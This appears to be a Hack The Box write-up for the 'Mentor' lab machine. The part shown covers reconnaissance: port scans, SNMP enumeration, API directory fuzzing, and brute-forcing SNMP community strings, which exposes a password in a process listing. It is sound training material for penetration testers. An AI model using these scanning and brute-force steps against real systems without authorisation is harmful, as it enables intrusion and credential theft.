Mentor-htb-writeup

0x00 Skills covered

Skills in this chapter: SNMP scanning, subdomain enumeration, directory enumeration, API endpoint analysis, command execution through one of the API endpoints, SNMP-Brute, Dockerfile configuration leak, port forwarding, ligolo-ng, psql, snmpd.conf leak, sudo privilege escalation

Reference: https://0xdf.gitlab.io/2023/03/11/htb-mentor.html

0x01 Getting user access

1. Target IP address: 10.10.11.193

2. Find the open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.193
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 12:14 CST
Nmap scan report for 10.10.11.193
Host is up (7.6s latency).
Not shown: 62652 filtered tcp ports (no-response), 2881 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 52.23 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 -sC -sV --min-rate=2000 10.10.11.193
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 12:16 CST
Nmap scan report for 10.10.11.193
Host is up (0.43s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c7:3b:fc:3c:f9:ce:ee:8b:48:18:d5:d1:af:8e:c2:bb (ECDSA)
|_ 256 44:40:08:4c:0e:cb:d4:f1:8e:7e:ed:a8:5c:68:a4:f7 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://mentorquotes.htb/
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.70 seconds

3. Add a hosts entry for the domain found in the scan

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.193 mentorquotes.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.193 mentorquotes.htb

4. Also run a UDP scan. Because of the VPN latency, this is the result after running the UDP scan several times

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.193 -sU
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 15:21 CST
Warning: 10.10.11.193 giving up on port because retransmission cap hit (10).
Nmap scan report for mentorquotes.htb (10.10.11.193)
Host is up (0.94s latency).
Not shown: 65451 open|filtered udp ports (no-response), 83 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 85.30 seconds

5. Browse to the domain:

http://mentorquotes.htb/

6. Enumerate port 161 to see whether the SNMP service leaks any information

┌──(kali㉿offsec)-[~/Desktop]
└─$ snmp-check 10.10.11.193
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.193:161 using SNMPv1 and community 'public'

[*] System information:

Host IP address : 10.10.11.193
Hostname : mentor
Description : Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
Contact : Me <admin@mentorquotes.htb>
Location : Sitting on the Dock of the Bay
Uptime snmp : 03:53:44.78
Uptime system : 03:53:29.36
System date : 2024-5-26 07:19:33.0

┌──(kali㉿offsec)-[~/Desktop]
└─$ snmpwalk -c public -v1 10.10.11.193
iso.3.6.1.2.1.1.1.0 = STRING: "Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (1403885) 3:53:58.85
iso.3.6.1.2.1.1.4.0 = STRING: "Me <admin@mentorquotes.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "mentor"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (1406557) 3:54:25.57
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 05 1A 07 14 0E 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-56-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 229
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB

7. Subdomain enumeration on this box is a trap: it has to be a deep enumeration. First, add a hosts entry for the subdomain...

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.193 api.mentorquotes.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.193 api.mentorquotes.htb

8. Enumerate directories on the subdomain

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://api.mentorquotes.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://api.mentorquotes.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

docs [Status: 200, Size: 969, Words: 194, Lines: 31, Duration: 163ms]
users [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 135ms]
admin [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 139ms]
quotes [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 134ms]
redoc [Status: 200, Size: 772, Words: 149, Lines: 28, Duration: 167ms]
server-status [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 133ms]
:: Progress: [220560/220560] :: Job [1/1] :: 226 req/sec :: Duration: [0:19:45] :: Errors: 0 ::

9. Visit the discovered paths

http://api.mentorquotes.htb/

view-source:http://api.mentorquotes.htb/docs

http://api.mentorquotes.htb/openapi.json

{"openapi":"3.0.2","info":{"title":"MentorQuotes","description":"Working towards helping people move forward","contact":{"name":"james","url":"http://mentorquotes.htb","email":"james@mentorquotes.htb"},"version":"0.0.1"},"paths":{"/auth/login":{"post":{"tags":["Auth"],"summary":"Login","operationId":"login_auth_login_post","requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/userSchema"}}},"required":true},"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/auth/signup":{"post":{"tags":["Auth"],"summary":"Create User","operationId":"create_user_auth_signup_post","requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/userSchema"}}},"required":true},"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/userDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/users/":{"get":{"tags":["Users"],"summary":"Get Users","operationId":"get_users_users__get","parameters":[{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"title":"Response Get Users Users  Get","type":"array","items":{"$ref":"#/components/schemas/userDB"}}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/users/{id}/":{"get":{"tags":["Users"],"summary":"Get User By Id","operationId":"get_user_by_id_users__id___get","parameters":[{"required":true,"schema":{"title":"Id","exclusiveMinimum":0.0,"type":"integer"},"name":"id","in":"path"},{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/userDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/users/add":{"post":{"tags":["Users"],"summary":"Create User","operationId":"create_user_users_add_post","parameters":[{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/userSchema"}}},"required":true},"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/userDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/quotes/":{"get":{"tags":["Quotes"],"summary":"Read All Quotes","operationId":"read_all_quotes_quotes__get","parameters":[{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"title":"Response Read All Quotes Quotes  Get","type":"array","items":{"$ref":"#/components/schemas/quoteDB"}}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}},"post":{"tags":["Quotes"],"summary":"Create Quote","operationId":"create_quote_quotes__post","parameters":[{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteSchema"}}},"required":true},"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/quotes/{id}/":{"get":{"tags":["Quotes"],"summary":"Read Quote","operationId":"read_quote_quotes__id___get","parameters":[{"required":true,"schema":{"title":"Id","exclusiveMinimum":0.0,"type":"integer"},"name":"id","in":"path"},{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}},"put":{"tags":["Quotes"],"summary":"Update Quote","operationId":"update_quote_quotes__id___put","parameters":[{"required":true,"schema":{"title":"Id","exclusiveMinimum":0.0,"type":"integer"},"name":"id","in":"path"},{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteSchema"}}},"required":true},"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}},"delete":{"tags":["Quotes"],"summary":"Delete Quote","operationId":"delete_quote_quotes__id___delete","parameters":[{"required":true,"schema":{"title":"Id","exclusiveMinimum":0.0,"type":"integer"},"name":"id","in":"path"},{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}}},"components":{"schemas":{"HTTPValidationError":{"title":"HTTPValidationError","type":"object","properties":{"detail":{"title":"Detail","type":"array","items":{"$ref":"#/components/schemas/ValidationError"}}}},"ValidationError":{"title":"ValidationError","required":["loc","msg","type"],"type":"object","properties":{"loc":{"title":"Location","type":"array","items":{"type":"string"}},"msg":{"title":"Message","type":"string"},"type":{"title":"Error Type","type":"string"}}},"quoteDB":{"title":"quoteDB","required":["title","description","id"],"type":"object","properties":{"title":{"title":"Title","maxLength":50,"minLength":3,"type":"string"},"description":{"title":"Description","maxLength":1500,"minLength":3,"type":"string"},"id":{"title":"Id","type":"integer"}}},"quoteSchema":{"title":"quoteSchema","required":["title","description"],"type":"object","properties":{"title":{"title":"Title","maxLength":50,"minLength":3,"type":"string"},"description":{"title":"Description","maxLength":1500,"minLength":3,"type":"string"}}},"userDB":{"title":"userDB","required":["id","email","username"],"type":"object","properties":{"id":{"title":"Id","type":"integer"},"email":{"title":"Email","type":"string"},"username":{"title":"Username","type":"string"}}},"userSchema":{"title":"userSchema","required":["email","username","password"],"type":"object","properties":{"email":{"title":"Email","type":"string","format":"email"},"username":{"title":"Username","maxLength":50,"minLength":5,"type":"string"},"password":{"title":"Password","maxLength":50,"minLength":8,"type":"string"}}}}}}

10. This reveals an email address and a large set of API endpoints

james@mentorquotes.htb

11. One more enumeration step is needed here: brute-forcing the SNMP community strings

https://github.com/SECFORCE/SNMP-Brute

┌──(kali㉿offsec)-[~/Desktop/SNMP-Brute]
└─$ python3 snmpbrute.py -t 10.10.11.193
_____ _ ____ _______ ____ __
/ ___// | / / |/ / __ \ / __ )_______ __/ /____
\__ \/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \
___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/
/____/_/ |_/_/ /_/_/ /_____/_/ \__,_/\__/\___/

SNMP Bruteforce & Enumeration Script v2.0
http://www.secforce.com / nikos.vassakis <at> secforce.com
###############################################################

Trying ['', '0', '0392a0', '1234', '2read', '3com', '3Com', '3COM', '4changes', 'access', 'adm', 'admin', 'Admin', 'administrator', 'agent', 'agent_steal', 'all', 'all private', 'all public', 'anycom', 'ANYCOM', 'apc', 'bintec', 'blue', 'boss', 'c', 'C0de', 'cable-d', 'cable_docsispublic@es0', 'cacti', 'canon_admin', 'cascade', 'cc', 'changeme', 'cisco', 'CISCO', 'cmaker', 'comcomcom', 'community', 'core', 'CR52401', 'crest', 'debug', 'default', 'demo', 'dilbert', 'enable', 'entry', 'field', 'field-service', 'freekevin', 'friend', 'fubar', 'guest', 'hello', 'hideit', 'host', 'hp_admin', 'ibm', 'IBM', 'ilmi', 'ILMI', 'intel', 'Intel', 'intermec', 'Intermec', 'internal', 'internet', 'ios', 'isdn', 'l2', 'l3', 'lan', 'liteon', 'login', 'logon', 'lucenttech', 'lucenttech1', 'lucenttech2', 'manager', 'master', 'microsoft', 'mngr', 'mngt', 'monitor', 'mrtg', 'nagios', 'net', 'netman', 'network', 'nobody', 'NoGaH$@!', 'none', 'notsopublic', 'nt', 'ntopia', 'openview', 'operator', 'OrigEquipMfr', 'ourCommStr', 'pass', 'passcode', 'password', 'PASSWORD', 'pr1v4t3', 'pr1vat3', 'private', ' private', 'private ', 'Private', 'PRIVATE', 'private@es0', 'Private@es0', 'private@es1', 'Private@es1', 'proxy', 'publ1c', 'public', ' public', 'public ', 'Public', 'PUBLIC', 'public@es0', 'public@es1', 'public/RO', 'read', 'read-only', 'readwrite', 'read-write', 'red', 'regional', '<removed>', 'rmon', 'rmon_admin', 'ro', 'root', 'router', 'rw', 'rwa', 'sanfran', 'san-fran', 'scotty', 'secret', 'Secret', 'SECRET', 'Secret C0de', 'security', 'Security', 'SECURITY', 'seri', 'server', 'snmp', 'SNMP', 'snmpd', 'snmptrap', 'snmp-Trap', 'SNMP_trap', 'SNMPv1/v2c', 'SNMPv2c', 'solaris', 'solarwinds', 'sun', 'SUN', 'superuser', 'supervisor', 'support', 'switch', 'Switch', 'SWITCH', 'sysadm', 'sysop', 'Sysop', 'system', 'System', 'SYSTEM', 'tech', 'telnet', 'TENmanUFactOryPOWER', 'test', 'TEST', 'test2', 'tiv0li', 'tivoli', 'topsecret', 'traffic', 'trap', 'user', 'vterm1', 'watch', 'watchit', 'windows', 'windowsnt', 'workstation', 'world', 'write', 'writeit', 'xyzzy', 'yellow', 'ILMI'] community strings ...
10.10.11.193 : 161 Version (v2c): internal
10.10.11.193 : 161 Version (v1): public
10.10.11.193 : 161 Version (v2c): public
10.10.11.193 : 161 Version (v1): public
10.10.11.193 : 161 Version (v2c): public
Waiting for late packets (CTRL+C to stop)

Trying identified strings for READ-WRITE ...

Identified Community strings
0) 10.10.11.193 internal (v2c)(RO)
1) 10.10.11.193 public (v1)(RO)
2) 10.10.11.193 public (v2c)(RO)
3) 10.10.11.193 public (v1)(RO)
4) 10.10.11.193 public (v2c)(RO)
Select Community to Enumerate [0]:internal

12. Enumerate with the newly found community string. snmpwalk was not used for this step because it prints far too much; the snmp-check output is shown below instead

snmpwalk -v2c -c internal 10.10.11.193

┌──(kali㉿offsec)-[~/Desktop]
└─$ snmp-check 10.10.11.193 -c internal -v 2c
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.193:161 using SNMPv2c and community 'internal'

[*] System information:

Host IP address : 10.10.11.193
Hostname : mentor
Description : Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
Contact : Me <admin@mentorquotes.htb>
Location : Sitting on the Dock of the Bay
Uptime snmp : 04:36:26.55
Uptime system : 04:36:11.15
System date : 2024-5-26 08:02:15.0

[*] Network information:

IP forwarding enabled : yes
Default TTL : 64
TCP segments received : 1425388
TCP segments sent : 1587784
TCP segments retrans : 40780
Input datagrams : 1697241
Delivered datagrams : 1693596
Output datagrams : 1618935

[*] Network interfaces:

Interface : [ up ] lo
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 10 Mbps
MTU : 65536
In octets : 509406
Out octets : 509406

Interface : [ up ] eth0
Id : 2
Mac Address : 00:50:56:b9:49:5a
Type : ethernet-csmacd
Speed : 4294 Mbps
MTU : 1500
In octets : 129369570
Out octets : 188377947

Interface : [ up ] br-7d5c72654da7
Id : 3
Mac Address : 02:42:68:9b:bc:93
Type : ethernet-csmacd
Speed : 4294 Mbps
MTU : 1500
In octets : 71597736
Out octets : 115745894

Interface : [ up ] br-a8a89c3bf6ff
Id : 4
Mac Address : 02:42:c0:ec:32:69
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 1500
In octets : 0
Out octets : 0

Interface : [ up ] docker0
Id : 5
Mac Address : 02:42:39:3a:24:68
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 1500
In octets : 0
Out octets : 0

Interface : [ up ] br-028c7a43f929
Id : 6
Mac Address : 02:42:da:c1:4f:9f
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 1500
In octets : 0
Out octets : 0

Interface : [ up ] br-24ddaa1f3b47
Id : 7
Mac Address : 02:42:18:b0:dc:53
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 1500
In octets : 0
Out octets : 0

Interface : [ up ] br-3d63c18e314d
Id : 8
Mac Address : 02:42:76:72:3c:26
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 1500
In octets : 0
Out octets : 0

Interface : [ up ] vethd75eef7
Id : 10
Mac Address : 3e:ae:2e:90:22:d3
Type : ethernet-csmacd
Speed : 4294 Mbps
MTU : 1500
In octets : 412444
Out octets : 447123

Interface : [ up ] veth7c0935f
Id : 12
Mac Address : 96:df:ba:db:a8:9d
Type : ethernet-csmacd
Speed : 4294 Mbps
MTU : 1500
In octets : 64492083
Out octets : 100469815

Interface : [ up ] vethbd6a9fa
Id : 14
Mac Address : 4e:8c:88:15:59:c0
Type : ethernet-csmacd
Speed : 4294 Mbps
MTU : 1500
In octets : 14634943
Out octets : 14834632


[*] Network IP:

Id IP Address Netmask Broadcast
2 10.10.11.193 255.255.254.0 1
1 127.0.0.1 255.0.0.0 0
5 172.17.0.1 255.255.0.0 1
4 172.18.0.1 255.255.0.0 1
7 172.19.0.1 255.255.0.0 1
6 172.20.0.1 255.255.0.0 1
8 172.21.0.1 255.255.0.0 1
3 172.22.0.1 255.255.0.0 1

[*] Routing information:

Destination Next hop Mask Metric
0.0.0.0 10.10.10.2 0.0.0.0 1
10.10.10.0 0.0.0.0 255.255.254.0 0
172.17.0.0 0.0.0.0 255.255.0.0 0
172.18.0.0 0.0.0.0 255.255.0.0 0
172.19.0.0 0.0.0.0 255.255.0.0 0
172.20.0.0 0.0.0.0 255.255.0.0 0
172.21.0.0 0.0.0.0 255.255.0.0 0
172.22.0.0 0.0.0.0 255.255.0.0 0

[*] TCP connections and listening ports:

Local address Local port Remote address Remote port State
0.0.0.0 22 0.0.0.0 0 listen
10.10.11.193 47616 8.8.8.8 53 synSent
127.0.0.1 35345 0.0.0.0 0 listen
127.0.0.53 53 0.0.0.0 0 listen
172.22.0.1 81 0.0.0.0 0 listen
172.22.0.1 5432 0.0.0.0 0 listen
172.22.0.1 5432 172.22.0.3 38048 established
172.22.0.1 5432 172.22.0.3 38814 established
172.22.0.1 8000 0.0.0.0 0 listen
172.22.0.1 33730 172.22.0.4 5432 established
172.22.0.1 59298 172.22.0.1 8000 closeWait

[*] Listening UDP ports:

Local address Local port
0.0.0.0 68
0.0.0.0 161
127.0.0.53 53

[*] Processes:

Id Status Name Path Parameters
1 runnable systemd /sbin/init
2 runnable kthreadd
..................
396 unknown raid5wq
454 runnable jbd2/dm-0-8
455 unknown ext4-rsv-conver
516 runnable systemd-journal /lib/systemd/systemd-journald
547 unknown kaluad
552 unknown kmpath_rdacd
553 unknown kmpathd
554 unknown kmpath_handlerd
555 runnable multipathd /sbin/multipathd -d -s
568 runnable systemd-udevd /lib/systemd/systemd-udevd
595 runnable systemd-network /lib/systemd/systemd-networkd
748 runnable jbd2/sda2-8
749 unknown ext4-rsv-conver
762 runnable systemd-resolve /lib/systemd/systemd-resolved
763 runnable systemd-timesyn /lib/systemd/systemd-timesyncd
778 runnable VGAuthService /usr/bin/VGAuthService
779 runnable vmtoolsd /usr/bin/vmtoolsd
807 runnable dhclient /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
858 runnable dbus-daemon @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
867 runnable irqbalance /usr/sbin/irqbalance --foreground
868 runnable networkd-dispat /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
869 runnable polkitd /usr/libexec/polkitd --no-debug
870 runnable rsyslogd /usr/sbin/rsyslogd -n -iNONE
871 runnable snapd /usr/lib/snapd/snapd
872 runnable systemd-logind /lib/systemd/systemd-logind
876 runnable udisksd /usr/libexec/udisks2/udisksd
925 runnable ModemManager /usr/sbin/ModemManager
1218 runnable cron /usr/sbin/cron -f -P
1220 running snmpd /usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
1236 runnable containerd /usr/bin/containerd
1242 runnable agetty /sbin/agetty -o -p -- \u --noclear tty1 linux
1265 runnable sshd sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
1280 runnable apache2 /usr/sbin/apache2 -k start
1281 runnable apache2 /usr/sbin/apache2 -k start
1282 runnable apache2 /usr/sbin/apache2 -k start
1347 runnable dockerd /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
1685 runnable login.sh /bin/bash /usr/local/bin/login.sh
1750 runnable docker-proxy /usr/bin/docker-proxy -proto tcp -host-ip 172.22.0.1 -host-port 5432 -container-ip 172.22.0.4 -container-port 5432
1766 runnable containerd-shim /usr/bin/containerd-shim-runc-v2 -namespace moby -id 96e44c5692920491cdb954f3d352b3532a88425979cd48b3959b63bfec98a6f4 -address /run/containerd/containerd.sock
1789 runnable postgres postgres
1863 runnable docker-proxy /usr/bin/docker-proxy -proto tcp -host-ip 172.22.0.1 -host-port 8000 -container-ip 172.22.0.3 -container-port 8000
1885 runnable containerd-shim /usr/bin/containerd-shim-runc-v2 -namespace moby -id 58de9fcf2b6a90b23e0245c0c3e17026442885b54e1be43c36f439950212e0a7 -address /run/containerd/containerd.sock
1908 runnable python3 python3 -m uvicorn app.main:app --reload --workers 2 --host 0.0.0.0 --port 8000
1921 runnable postgres postgres: checkpointer
1922 runnable postgres postgres: background writer
1923 runnable postgres postgres: walwriter
1924 runnable postgres postgres: autovacuum launcher
1925 runnable postgres postgres: stats collector
1926 runnable postgres postgres: logical replication launcher
1986 runnable docker-proxy /usr/bin/docker-proxy -proto tcp -host-ip 172.22.0.1 -host-port 81 -container-ip 172.22.0.2 -container-port 80
2002 runnable containerd-shim /usr/bin/containerd-shim-runc-v2 -namespace moby -id 4fea1fbfee050c8d74ef96b0a317c563734566ac9d5f3125592b0f58e2391a82 -address /run/containerd/containerd.sock
2024 runnable python python main.py
2066 runnable python3 /usr/local/bin/python3 -c from multiprocessing.semaphore_tracker import main;main(4)
2067 runnable python3 /usr/local/bin/python3 -c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=5, pipe_handle=7) --multiprocessing-fork
2089 runnable postgres postgres: postgres mentorquotes_db 172.22.0.1(33730) idle
2131 runnable login.py /usr/bin/python3 /usr/local/bin/login.py kj23sadkj123as0-d213
5535 runnable apache2 /usr/sbin/apache2 -k start
7368 unknown kworker/0:1-events
7389 runnable upowerd /usr/libexec/upowerd
8400 unknown kworker/1:1-events
8403 unknown kworker/0:0-cgroup_destroy
8436 unknown kworker/u256:3-flush-253:0
8487 unknown kworker/1:0-events
8538 runnable postgres postgres: postgres mentorquotes_db 172.22.0.1(50524) idle
20970 unknown kworker/u256:0-events_power_efficient
21067 unknown kworker/u256:2-flush-253:0
21088 unknown kworker/u256:1-flush-253:0

[*] Storage information:

Description : ["Physical memory"]
Device id : [#<SNMP::Integer:0x0000ffff7bc68f10 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bc9ce78 @value=1024>]
Memory size : 3.80 GB
Memory used : 1.34 GB

Description : ["Virtual memory"]
Device id : [#<SNMP::Integer:0x0000ffff7bcbec80 @value=3>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bd2ea58 @value=1024>]
Memory size : 4.30 GB
Memory used : 1.34 GB

Description : ["Memory buffers"]
Device id : [#<SNMP::Integer:0x0000ffff7bbe9148 @value=6>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bbeeeb8 @value=1024>]
Memory size : 3.80 GB
Memory used : 53.21 MB

Description : ["Cached memory"]
Device id : [#<SNMP::Integer:0x0000ffff7bc19eb0 @value=7>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bc1ffb8 @value=1024>]
